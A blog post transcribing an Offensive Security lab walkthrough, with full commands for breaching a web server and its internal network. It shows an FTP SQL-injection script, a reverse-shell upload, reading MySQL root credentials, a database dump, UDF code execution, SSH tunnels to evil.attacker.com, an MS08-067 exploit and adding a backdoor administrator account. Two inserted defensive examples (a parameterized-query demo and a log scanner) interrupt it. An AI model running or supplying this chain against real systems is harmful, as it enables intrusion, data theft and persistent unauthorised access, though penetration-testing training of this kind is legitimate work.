Hacking, cracking and penetration testing are the hot topics of this blog, and we have covered several tutorials based on BackTrack Linux, especially BackTrack 5 R1 since it is the newest release. Many BackTrack video tutorials, however, were recorded on earlier versions such as BackTrack 4. The aim is the same: to teach people how to carry out a penetration test.
Offensive Security
I think there is no need to introduce Offensive Security. I was searching the Internet and found a wonderful video tutorial made by the Offensive Security team.
This video covers remote penetration testing and shows how to enumerate and map the internal network behind a web server (database, SMS and other servers). Although it was recorded on an earlier version of BackTrack, it applies equally to BackTrack 5 R1 because the tools are the same.
Commands & Tools Discussed in the Video 
 
 ftp-brute.py 
 #!/usr/bin/python
 # Walks the ftpuser table one row at a time through the SQL injection in the FTP login
 from ftplib import FTP
 print "Attempting user Directory Discover via FTP"
 for i in range(0,6):
     # LIMIT i,1 selects the i-th row of ftpuser; "-- " comments out the rest of the original query
     username = "%') and 1=2 union select 1,1,uid,gid,homedir,shell from ftpuser LIMIT " + str(i) + ",1; -- "
     password = "1"
     ftp = FTP('www.offseclabs.com')
     ftp.login(username, password)
     print "Logged in as user " + str(i) + ",1"
     ftp.retrlines('LIST')
     ftp.close()
Open Terminal A : 
nmap -p 21,80 www.offseclabs.com                     
nc -v www.offseclabs.com 80 
HEAD / HTTP/1.0 
(To enumerate the webserver) 
clear 
ftp www.offseclabs.com 
username - bob 
password - bob 
(To enumerate the ftp server) 
ftp www.offseclabs.com 
username - %') and 1=2 union select 1,1,uid,gid,homedir,shell from ftpuser; --   
password - 1 
(logged in to the ftp server) 
pwd 
ls 
bye 
clear 
cd core 
clear 
nano brute.py --> (see ftp-brute.py above) 
./brute.py 
(get the fifth user, whose home directory is mapped to the document root of the web server) 
clear 
ftp www.offseclabs.com 
username - %') and 1=2 union select 1,1,uid,gid,homedir,shell from ftpuser LIMIT 5,1; --   
password - 1 
(logged in as the fifth user) 
ls 
put rs.php --> (a reverse PHP shell) 
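Why the FTP server accepts that username, and what closes the hole, as an added example that is not part of the video or the page: the ftpuser table, its column layout and the shape of the vulnerable lookup are assumptions constructed for this script. It replays the payload from ftp-brute.py against an in-memory SQLite table through a string-built query, then through the same lookup with bound parameters.

```python
import sqlite3

# Constructed stand-in for the ftpuser table the page's payload reads;
# the column layout and every row value are assumptions for this example.
FTPUSERS = [
    ("bob",   "bob", 1001, 1001, "/home/bob",   "/bin/false"),
    ("carol", "c4r", 1002, 1002, "/home/carol", "/bin/false"),
    ("dave",  "d4v", 1003, 1003, "/home/dave",  "/bin/false"),
    ("erin",  "3r1", 1004, 1004, "/home/erin",  "/bin/false"),
    ("frank", "fr4", 1005, 1005, "/home/frank", "/bin/false"),
    ("www",   "w3b", 1006, 1006, "/var/www",    "/bin/false"),
]

COLUMNS = "userid, passwd, uid, gid, homedir, shell"

def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE ftpuser (userid TEXT, passwd TEXT, uid INT, "
               "gid INT, homedir TEXT, shell TEXT)")
    db.executemany("INSERT INTO ftpuser VALUES (?,?,?,?,?,?)", FTPUSERS)
    return db

def injected_username(i):
    # The username string from the page's brute.py: closes the LIKE literal
    # and the parenthesis, UNIONs in the i-th ftpuser row, comments out the rest.
    return ("%') and 1=2 union select 1,1,uid,gid,homedir,shell from ftpuser "
            "LIMIT " + str(i) + ",1; -- ")

def login_vulnerable(db, username, password):
    # Assumed shape of the original lookup: credentials spliced into the SQL
    # text, so quote and parenthesis characters in the username rewrite the query.
    sql = ("SELECT %s FROM ftpuser WHERE (userid LIKE '%s%%' AND passwd = '%s')"
           % (COLUMNS, username, password))
    return db.execute(sql).fetchall()

def login_hardened(db, username, password):
    # Same lookup with bound parameters: the whole payload is compared as a
    # literal username, matches no row, and the UNION is never parsed as SQL.
    sql = "SELECT %s FROM ftpuser WHERE userid = ? AND passwd = ?" % COLUMNS
    return db.execute(sql, (username, password)).fetchall()

if __name__ == "__main__":
    db = make_db()
    print(login_vulnerable(db, injected_username(5), "1"))  # one row: /var/www
    print(login_hardened(db, injected_username(5), "1"))    # []
```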
----------------------- 
Open Terminal B : 
nc -lvp 80 
----------------------- 
Open Terminal C : 
wget www.offseclabs.com/rs.php 
(Then, at Terminal B, we get a reverse shell) 
----------------------- 
Go back to Terminal B : 
(inside the reverse shell) 
/sbin/ifconfig 
pwd 
cd /var/www 
ls -la 
cd includes 
cat configure.php 
(get the MySQL username and password as well as MySQL server address and database name) 
mysqldump -u root -p1q2w3e4r5t6y -h 10.150.0.5 oscommerce > /var/www/images/ccdump.txt 
------------------------ 
Open a Firefox : 
www.offseclabs.com/images/ccdump.txt 
(we got the database dump) 
------------------------- 
Go back to Terminal A : 
(inside the ftp server) 
put up.html --> (the HTML file-upload form) 
put up.php --> (the PHP file-upload handler) 
------------------------- 
Open Firefox : 
www.offseclabs.com/up.html 
(upload lib_mysqludf_sys.so and mark it as 1) 
(upload rs [a binary reverse shell] and mark it as 2) 
** Details of lib_mysqludf_sys.so 
--------------------------- 
Go back to Terminal A : 
(quit the ftp server) 
bye 
clear 
exit 
(quit Terminal A) 
---------------------------- 
Go back to Terminal B : 
mysql -u root -p1q2w3e4r5t6y -h 10.150.0.5 
(login to MySQL server) 
use pwn; 
SELECT imgdata from binfile where title="1" into dumpfile '/usr/lib/lib_mysqludf_sys.so'; 
SELECT imgdata from binfile where title="2" into dumpfile '/tmp/bd'; 
CREATE FUNCTION lib_mysqludf_sys_info RETURNS string SONAME 'lib_mysqludf_sys.so'; 
CREATE FUNCTION sys_get RETURNS string SONAME 'lib_mysqludf_sys.so'; 
CREATE FUNCTION sys_set RETURNS int SONAME 'lib_mysqludf_sys.so'; 
CREATE FUNCTION sys_exec RETURNS int SONAME 'lib_mysqludf_sys.so'; 
CREATE FUNCTION sys_eval RETURNS string SONAME 'lib_mysqludf_sys.so'; 
SELECT sys_eval('chmod 755 /tmp/bd'); 
SELECT sys_eval('/tmp/bd &'); 
(don't press Enter yet) 
--------------------------- 
Open Terminal D : 
nc -lvp 80 
(go back to Terminal B and press Enter; you will get a reverse shell at Terminal D) 
---------------------------- 
Open Terminal E : 
nc -lvp 80 
---------------------------- 
Go back to Terminal B : 
(inside the MySQL server) 
SELECT sys_eval('/tmp/bd &'); 
(press Enter and we get another reverse shell at Terminal E) 
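What the MySQL side of this chain looks like to a defender, as an added example that is not part of the original post: a small scanner over constructed general-query-log lines (the older "date time  thread command  argument" layout is assumed, and the host 10.150.0.7 is made up) that flags root logins from remote hosts, INTO DUMPFILE/OUTFILE writes, UDF registration via SONAME, and calls to sys_eval/sys_exec.

```python
import re

# Constructed sample lines in the older MySQL general-query-log layout;
# thread ids, timestamps and the 10.150.0.7 client address are made up.
SAMPLE_LOG = """\
111005 14:02:11\t   12 Connect\tosc_app@10.150.0.7 on oscommerce
111005 14:02:11\t   12 Query\tSELECT products_id, products_price FROM products WHERE products_id = 42
111005 14:05:40\t   13 Connect\troot@10.150.0.7 on
111005 14:05:41\t   13 Query\tuse pwn
111005 14:05:52\t   13 Query\tSELECT imgdata from binfile where title="1" into dumpfile '/usr/lib/lib_mysqludf_sys.so'
111005 14:06:03\t   13 Query\tCREATE FUNCTION sys_eval RETURNS string SONAME 'lib_mysqludf_sys.so'
111005 14:06:20\t   13 Query\tSELECT sys_eval('/tmp/bd &')
111005 14:07:00\t   14 Connect\tosc_app@localhost on oscommerce
"""

# date time <tab> thread command <tab> argument
LINE_RE = re.compile(r"^(?P<ts>\d{6} [\d:]{8})\t\s*(?P<thread>\d+) (?P<cmd>\w+)\t(?P<arg>.*)$")

# Query-text patterns that correspond to the steps in the walkthrough above.
RULES = [
    ("file-write-via-sql", re.compile(r"\bINTO\s+(DUMP|OUT)FILE\b", re.I)),
    ("udf-load",           re.compile(r"\bCREATE\s+FUNCTION\b.*\bSONAME\b", re.I)),
    ("udf-shell-call",     re.compile(r"\bsys_(eval|exec)\s*\(", re.I)),
]

LOCAL_HOSTS = ("localhost", "127.0.0.1")

def parse(line):
    """Split one log line into its fields, or return None if it does not fit."""
    m = LINE_RE.match(line)
    return m.groupdict() if m else None

def scan(text):
    """Return (thread, rule, argument) for every suspicious entry, in log order."""
    hits = []
    for raw in text.splitlines():
        rec = parse(raw)
        if rec is None:
            continue
        thread = int(rec["thread"])
        if rec["cmd"] == "Connect":
            user, _, rest = rec["arg"].partition("@")
            host = rest.split(" ")[0]
            if user == "root" and host not in LOCAL_HOSTS:
                hits.append((thread, "remote-root-connect", rec["arg"]))
        elif rec["cmd"] == "Query":
            for name, pattern in RULES:
                if pattern.search(rec["arg"]):
                    hits.append((thread, name, rec["arg"]))
    return hits

if __name__ == "__main__":
    for thread, rule, arg in scan(SAMPLE_LOG):
        print("thread %d  %-20s %s" % (thread, rule, arg))
```

The general log has to be enabled for this to see anything, and it is a safety net rather than the fix: the chain above only works because the web application connects as root and the server account may write to /usr/lib.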
--------------------------- 
Go back to Terminal E : 
(inside the reverse shell) 
ping -c 1 10.150.0.20 
clear 
ssh -l root -t -t -R 445:10.150.0.20:445 evil.attacker.com 
(create a remote tunnel at port 445) 
----------------------------- 
Open Terminal F : 
netstat -antp 
nmap -sS 127.0.0.1 -p445 --script smb-check-vulns.nse 
----------------------------- 
Go back to Terminal D : 
ssh -l root -t -t -R 4444:10.150.0.20:4444 evil.attacker.com 
(create a remote tunnel at port 4444) 
clear 
------------------------------ 
Go back to Terminal F : 
cd core 
nano nx.py --> (an MS08-067 Python exploit for Windows 2003 SP2) 
clear 
./nx.py 127.0.0.1 
nc -v 127.0.0.1 4444 
(we get a remote shell on 10.150.0.20) 
ipconfig 
net user hacker hacker /add 
net localgroup administrators hacker /add 
--------------------------------- 
Go back to Terminal D : 
(quit the tunnel) 
exit 
clear 
ssh -l root -t -t -R 3389:10.150.0.20:3389 evil.attacker.com 
(create another remote tunnel on port 3389) 
clear 
----------------------------------- 
Open Terminal G : 
netstat -antp | grep LISTEN 
clear 
rdesktop 127.0.0.1 
(log in to 10.150.0.20 with username hacker and password hacker) 